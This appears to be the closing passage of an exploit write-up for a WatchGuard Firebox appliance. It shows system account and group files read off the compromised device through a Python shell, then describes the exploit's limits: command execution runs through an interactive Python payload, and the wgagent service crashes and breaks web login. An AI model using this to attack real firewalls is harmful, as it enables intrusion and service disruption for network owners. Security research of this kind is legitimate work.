sshd:x:89:89:sshd privilege separation:/var/empty:
quagga:x:88:88:Quagga Dynamic Routing:/var/run/quagga:
wgcha:x:92:96:WG Call Home Agent:/var/run/wgcha:
netdbg:x:87:87:Diagnostic Utilities:/tmp/netdbg:
cwagent:x:100:100:ConnectWise Agent:/var/empty:
dimension:x:101:101:Dimension Service:/var/run/dimension:
tss:x:102:102:trousers daemon:/:
atagent:x:103:103:Autotask Agent:/var/empty:
psad:x:104:104:PSA Daemon:/var/empty:
guac:x:105:105:Guacamole Daemons:/var/run/guac:
portald:x:106:105:Portald:/var/run/portald:
admin:x:109:109:Admin Cli Access:/etc/wg/admin-home:/usr/bin/cli
wgadmin:x:109:109:Admin Cli Access:/etc/wg/admin-home:/usr/bin/cli
dnswatchd:x:110:96:DNSWatch Service Daemon:/var/empty:
tpagent:x:111:96:Tigerpaw Agent:/var/empty:

>>> print(open("/etc/group").read())
admin:x:0:0
bin:x:1:admin,bin
nobody:x:99:
wgntp:x:98:
openvpn:x:97:
wg:x:96:
ui:x:95:
proxy:x:94:
sshd:x:89:
quagga:x:88:
netdbg:x:87:
cwagent:x:100:
dimension:x:101:
tss:x:102:
atagent:x:103:
psad:x:104:
ctlvpn:x:105:
dnswatchd:x:107:

>>> os.uname()
('Linux', 'FireboxV', '4.14.83', '#1 SMP Mon Sep 27 17:48:07 PDT 2021', 'x86_64')
>>>
```
## Limitations
There is no `shell` installed and there is only a `busybox` version available with a very limited unix command set. The only option is to use the interactive python shell (`/usr/bin/python -i`) as payload to get access to the target. Check out `https://docs.python.org/2.7/library/os.html` to execute commands on the target.
Another limitation is the crash of `wgagent` service that will show up in the diagnostic log and will break the user login via the `webui`.


